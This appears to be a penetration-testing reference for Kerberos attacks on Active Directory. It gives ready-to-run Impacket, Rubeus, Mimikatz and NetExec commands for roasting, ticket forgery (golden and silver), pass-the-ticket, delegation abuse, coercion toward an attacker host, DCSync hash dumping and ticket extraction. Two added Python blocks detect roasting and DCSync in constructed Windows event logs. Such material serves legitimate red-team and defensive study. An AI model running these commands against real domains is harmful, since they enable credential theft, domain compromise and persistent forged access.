Kerberos Attacks
AS-REP Roasting, Kerberoasting, Pass-the-Ticket, Overpass-the-Hash, Golden/Silver tickets, unconstrained/constrained/RBCD delegation abuse, Bronze Bit, and DCSync. Complete Rubeus + impacket reference.
Kerberos is the authentication backbone of every AD environment. Every attack in this note exploits one of three weaknesses: weak encryption (AS-REP/Kerberoast), forged tickets (Golden/Silver), or trusted delegation (unconstrained/constrained/RBCD).
AS-REP Roasting
Accounts with the DONT_REQ_PREAUTH flag set return an AS-REP without any proof of the password. Part of that reply is encrypted with the user's key, so it can be cracked offline.
# Impacket — check user list without credentials
GetNPUsers.py corp.local/ -no-pass -usersfile users.txt -dc-ip DC_IP -format hashcat
# Impacket — with credentials
GetNPUsers.py corp.local/user:pass -request -format hashcat -dc-ip DC_IP
# NetExec
nxc ldap DC_IP -u user -p pass --asreproast asrep.txt
nxc ldap DC_IP -u users.txt -p '' --asreproast asrep.txt # user list, no password
# Rubeus (Windows)
.\Rubeus.exe asreproast /nowrap /format:hashcat /outfile:asrep.txt
# PowerView — enumerate targets first
Get-DomainUser -KerberosPreauthNotRequired | select samaccountname
# Crack
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
Kerberoasting
Any authenticated domain user can request a TGS for any account with a Service Principal Name (SPN). The TGS is encrypted with the service account’s NTLM hash → crack offline.
# Impacket
GetUserSPNs.py corp.local/user:pass -dc-ip DC_IP -request -outputfile tgs.txt
# Impacket with hash
GetUserSPNs.py -hashes :NTLM_HASH corp.local/user -dc-ip DC_IP -request
# NetExec
nxc ldap DC_IP -u user -p pass --kerberoasting tgs.txt
# Rubeus (Windows)
.\Rubeus.exe kerberoast /nowrap /outfile:tgs.txt
# Targeted (specific account)
.\Rubeus.exe kerberoast /user:sqlsvc /nowrap
# PowerView — request TGS and output directly
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File tgs.txt -Encoding ASCII
# Crack
hashcat -m 13100 tgs.txt /usr/share/wordlists/rockyou.txt
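Detection logic for the two roasting techniques above, written as an added example for this page (not part of the original reference or of any tool it names). It runs over constructed Windows Security event records whose keys mirror the 4768/4769 event fields: a 4768 with PreAuthType 0 is the AS-REP roasting signal, and a burst of RC4 (0x17) service-ticket requests for non-computer accounts from one user is the Kerberoasting signal. The window and threshold are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # 4769 TicketEncryptionType for RC4; AES tickets log 0x11/0x12
NO_PREAUTH = "0"    # 4768 PreAuthType 0: TGT issued without pre-authentication

# Constructed sample records (not real logs); keys mirror the 4768/4769 event fields.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc_backup", "PreAuthType": "0",
     "IpAddress": "10.0.0.55", "TimeCreated": "2024-05-01T10:00:01"},
    {"EventID": 4768, "TargetUserName": "jsmith", "PreAuthType": "2",
     "IpAddress": "10.0.0.23", "TimeCreated": "2024-05-01T10:00:02"},
    {"EventID": 4769, "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "sqlsvc",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.55",
     "TimeCreated": "2024-05-01T10:01:00"},
    {"EventID": 4769, "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "http_svc",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.55",
     "TimeCreated": "2024-05-01T10:01:05"},
    {"EventID": 4769, "TargetUserName": "jsmith@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.23",
     "TimeCreated": "2024-05-01T10:02:00"},
]


def asrep_roast_indicators(events):
    """4768 with PreAuthType 0: an AS-REP encrypted with the user's key left the DC
    without any proof of the password, which is exactly what AS-REP roasting harvests."""
    return [(e["TargetUserName"], e["IpAddress"])
            for e in events if e["EventID"] == 4768 and e["PreAuthType"] == NO_PREAUTH]


def kerberoast_indicators(events, window=timedelta(minutes=5), threshold=2):
    """Per requesting user: RC4 service tickets for non-computer service accounts,
    several within a short window. One RC4 TGS can be legitimate; a burst rarely is."""
    rc4_by_user = defaultdict(list)
    for e in events:
        if (e["EventID"] == 4769 and e["TicketEncryptionType"] == RC4_HMAC
                and not e["ServiceName"].endswith("$") and e["ServiceName"] != "krbtgt"):
            rc4_by_user[e["TargetUserName"]].append(
                (datetime.fromisoformat(e["TimeCreated"]), e["ServiceName"]))
    findings = {}
    for user, requests in rc4_by_user.items():
        requests.sort()
        first = requests[0][0]
        services = sorted({svc for ts, svc in requests if ts - first <= window})
        if len(services) >= threshold:
            findings[user] = services
    return findings
```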
Targeted Kerberoasting (GenericWrite required)
When you have GenericWrite on a user: set a fake SPN, Kerberoast, then remove:
Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/spn.corp.local'}
Invoke-Kerberoast -Identity victim -OutputFormat Hashcat
Set-DomainObject -Identity victim -Clear serviceprincipalname
Pass-the-Ticket (PTT)
Inject a .ccache (Linux) or .kirbi (Windows) ticket into the current session:
# Linux — set environment variable; with -k the target must be a hostname/FQDN, not an IP, or the SPN lookup fails
export KRB5CCNAME=/tmp/ticket.ccache
psexec.py -k -no-pass corp.local/user@TARGET_FQDN
wmiexec.py -k -no-pass corp.local/user@TARGET_FQDN
secretsdump.py -k -no-pass corp.local/user@DC_FQDN
# Windows — Rubeus
.\Rubeus.exe ptt /ticket:BASE64_TICKET
.\Rubeus.exe ptt /ticket:C:\Temp\ticket.kirbi
# Windows — Mimikatz
kerberos::ptt ticket.kirbi
# Verify injection
klist
dir \\TARGET\C$
Overpass-the-Hash (Pass-the-Key)
Convert an NTLM hash into a Kerberos TGT — authenticates via Kerberos, not NTLM:
# Impacket — get TGT, then use with PTT
getTGT.py corp.local/user -hashes :NTLM_HASH -dc-ip DC_IP
export KRB5CCNAME=user.ccache
wmiexec.py -k -no-pass corp.local/user@TARGET_FQDN   # Kerberos needs the hostname, not an IP
# AES key (stealthier — no RC4 in logs)
getTGT.py corp.local/user -aesKey AES256_KEY -dc-ip DC_IP
# Rubeus — request TGT and inject
.\Rubeus.exe asktgt /user:jsmith /rc4:NTLM_HASH /ptt
.\Rubeus.exe asktgt /user:jsmith /aes256:AES256_KEY /ptt
# Mimikatz
sekurlsa::pth /user:jsmith /domain:corp.local /ntlm:NTLM_HASH /run:cmd.exe
Golden Ticket
Forge a TGT signed with the krbtgt hash — valid for any user, any group, 10 years by default. Requires krbtgt hash (from DCSync or domain admin session).
# Step 1 — get krbtgt hash
secretsdump.py -just-dc-user krbtgt corp.local/admin:pass@DC_IP
# Mimikatz: lsadump::dcsync /user:krbtgt
# Step 2 — forge ticket (Linux)
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-XXXX -domain corp.local Administrator
export KRB5CCNAME=Administrator.ccache
wmiexec.py -k -no-pass corp.local/Administrator@TARGET_FQDN   # Kerberos needs the hostname, not an IP
# Step 2 — forge ticket (Windows — Rubeus)
.\Rubeus.exe golden /user:Administrator /domain:corp.local /sid:S-1-5-21-XXXX /rc4:KRBTGT_HASH /ptt
# Mimikatz
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-XXXX /krbtgt:HASH /ptt
Silver Ticket
Forge a TGS for a specific service using the service account’s hash. No KDC contact needed — operates offline.
# Impacket (Linux)
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-XXXX -domain corp.local \
-spn CIFS/target.corp.local Administrator
export KRB5CCNAME=Administrator.ccache
# Rubeus (Windows)
.\Rubeus.exe silver /user:Administrator /service:cifs/target.corp.local \
/rc4:SERVICE_HASH /domain:corp.local /sid:S-1-5-21-XXXX /ptt
# Mimikatz
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-XXXX \
/target:target.corp.local /service:cifs /rc4:SERVICE_HASH /ptt
Common silver ticket SPNs: cifs/TARGET, host/TARGET, http/TARGET, mssqlsvc/TARGET:1433
Unconstrained Delegation
Computers with TrustedForDelegation store TGTs of all users that authenticate to them. Compromise the host → capture DA TGT.
# Enumerate (from Linux)
nxc ldap DC_IP -u user -p pass --trusted-for-delegation
# From Windows
Get-DomainComputer -Unconstrained | select dnshostname
# Rubeus monitor — capture incoming tickets on the compromised host
.\Rubeus.exe monitor /interval:5 /targetuser:Administrator
# Coerce DC auth (Printer Bug — forces DC to authenticate)
python3 printerbug.py 'corp.local/user:pass'@DC_IP ATTACKER_HOST_IP
# PetitPotam coercion
python3 PetitPotam.py -u user -p pass -d corp.local ATTACKER_HOST_IP DC_IP
# Extract and use TGT
.\Rubeus.exe ptt /ticket:BASE64_TGT
Constrained Delegation
Accounts with msDS-AllowedToDelegateTo set can impersonate any user to specific services.
# Enumerate
nxc ldap DC_IP -u user -p pass --find-delegation
Get-DomainUser -TrustedToAuth | select samaccountname, 'msds-allowedtodelegateto'
Get-DomainComputer -TrustedToAuth | select dnshostname, 'msds-allowedtodelegateto'
# S4U2Self + S4U2Proxy — impersonate Administrator (Rubeus)
.\Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator \
/msdsspn:CIFS/target.corp.local /ptt
# Impacket
getST.py -spn cifs/target.corp.local -impersonate Administrator \
-dc-ip DC_IP corp.local/svc_account:pass
# newer impacket names the file <user>@<spn with / replaced by _>@<DOMAIN>.ccache; use the name getST.py prints
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass corp.local/Administrator@target.corp.local
Resource-Based Constrained Delegation (RBCD)
Write msDS-AllowedToActOnBehalfOfOtherIdentity on a target computer object to allow a controlled account to delegate to it.
Requirements: GenericWrite/GenericAll/WriteDACL on the target computer object + a computer account you control.
# 1. Create fake computer account (if Machine Account Quota > 0)
addcomputer.py -computer-name 'EVILPC$' -computer-pass 'EvilPass123!' \
corp.local/user:pass -dc-ip DC_IP
# 2. Set RBCD attribute on target
rbcd.py -delegate-from 'EVILPC$' -delegate-to 'TARGET$' \
-action write corp.local/user:pass -dc-ip DC_IP
# 3. Request impersonation ticket
getST.py -spn cifs/TARGET.corp.local -impersonate Administrator \
-dc-ip DC_IP corp.local/'EVILPC$:EvilPass123!'
export KRB5CCNAME=Administrator.ccache   # use the file name getST.py prints
# 4. Use the ticket
psexec.py -k -no-pass corp.local/Administrator@TARGET.corp.local
secretsdump.py -k -no-pass corp.local/Administrator@TARGET.corp.local
# Windows — PowerView + Rubeus
# Set RBCD
$target = Get-DomainComputer TARGET
$evilpc_sid = (Get-DomainComputer 'EVILPC$').objectsid
$sd = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$evilpc_sid)"
$sdBytes = New-Object byte[] ($sd.BinaryLength)
$sd.GetBinaryForm($sdBytes, 0)
$target | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$sdBytes}
# Request S4U ticket (EVILPC_HASH = NTLM hash of the computer account password)
.\Rubeus.exe s4u /user:EVILPC$ /rc4:EVILPC_HASH /impersonateuser:Administrator /msdsspn:cifs/TARGET.corp.local /ptt
DCSync
Pull all domain hashes by mimicking a DC replication request. Requires Replicating Directory Changes All permission.
# secretsdump (Linux — most reliable)
secretsdump.py corp.local/user:pass@DC_IP -just-dc-ntlm
secretsdump.py corp.local/user:pass@DC_IP -just-dc-user krbtgt
# With hash
secretsdump.py -hashes :NTLM_HASH corp.local/user@DC_IP -just-dc-ntlm
# Mimikatz (Windows)
lsadump::dcsync /domain:corp.local /user:Administrator
lsadump::dcsync /domain:corp.local /all /csv
# NetExec
nxc smb DC_IP -u admin -p pass --ntds
nxc smb DC_IP -u admin -p pass --ntds vss
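Detection of the replication request described above, as an added example for this page (not code from the original reference, impacket or Mimikatz). It scans constructed Windows Security event 4662 records for the DS-Replication control-access right GUIDs used by an account that is not a domain controller, and recovers the source IP by joining the 4662 SubjectLogonId to a constructed 4624 logon record, since 4662 itself carries no address. The DC list and allowlist (for a legitimate directory-sync account) are assumptions; 4662 is only logged when Directory Service Access auditing is enabled.

```python
import re

# Control-access right GUIDs that appear in the Properties field of event 4662
REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GET_CHANGES_FILTERED = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_RIGHTS = {REPL_GET_CHANGES, REPL_GET_CHANGES_ALL, REPL_GET_CHANGES_FILTERED}
GUID_RE = re.compile(r"\{([0-9a-f-]{36})\}", re.IGNORECASE)

# Constructed records (not real logs); Properties is formatted the way 4662 renders it.
SAMPLE_4624 = [
    {"TargetUserName": "jsmith", "TargetLogonId": "0x3e7f1a", "IpAddress": "10.0.0.55"},
    {"TargetUserName": "DC02$", "TargetLogonId": "0x1a2b3c", "IpAddress": "10.0.0.11"},
]
SAMPLE_4662 = [
    {"SubjectUserName": "DC02$", "SubjectLogonId": "0x1a2b3c",   # normal DC-to-DC replication
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"SubjectUserName": "jsmith", "SubjectLogonId": "0x3e7f1a",   # user account pulling changes
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"SubjectUserName": "jsmith", "SubjectLogonId": "0x3e7f1a",   # plain read of a user object
     "Properties": "%%7688\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights(event):
    """Set of DS-Replication GUIDs present in one 4662 Properties value."""
    return {g.lower() for g in GUID_RE.findall(event["Properties"])} & REPLICATION_RIGHTS


def dcsync_suspects(events_4662, events_4624, dc_accounts, allowlist=frozenset()):
    """Replication-right use by anything other than a DC or an approved sync account,
    with the source IP recovered from the matching 4624 logon session."""
    ip_by_logon = {e["TargetLogonId"]: e["IpAddress"] for e in events_4624}
    suspects = []
    for e in events_4662:
        rights, actor = replication_rights(e), e["SubjectUserName"]
        if not rights or actor in dc_accounts or actor in allowlist:
            continue
        suspects.append((actor, ip_by_logon.get(e["SubjectLogonId"], "unknown"), sorted(rights)))
    return suspects
```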
Bronze Bit (CVE-2020-17049)
Bypass constrained delegation PROTOCOL_TRANSITION restriction using a forged service ticket PAC.
# Linux equivalent: impacket getST.py with -force-forwardable performs the same bypass
# Exploit: the S4U2self service ticket is decrypted with the service key, its "forwardable" flag (a ticket flag, not a PAC field) is set, and the re-encrypted ticket is used in S4U2proxy
.\Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:Administrator \
/msdsspn:cifs/target /bronzebit /ptt
Ticket Extraction from Memory
# Mimikatz — export all tickets from memory
kerberos::list /export
# Rubeus — dump all tickets in memory
.\Rubeus.exe dump /nowrap
# Rubeus — dump specific ticket
.\Rubeus.exe dump /user:Administrator /nowrap
# Rubeus — harvest TGTs continuously
.\Rubeus.exe harvest /interval:30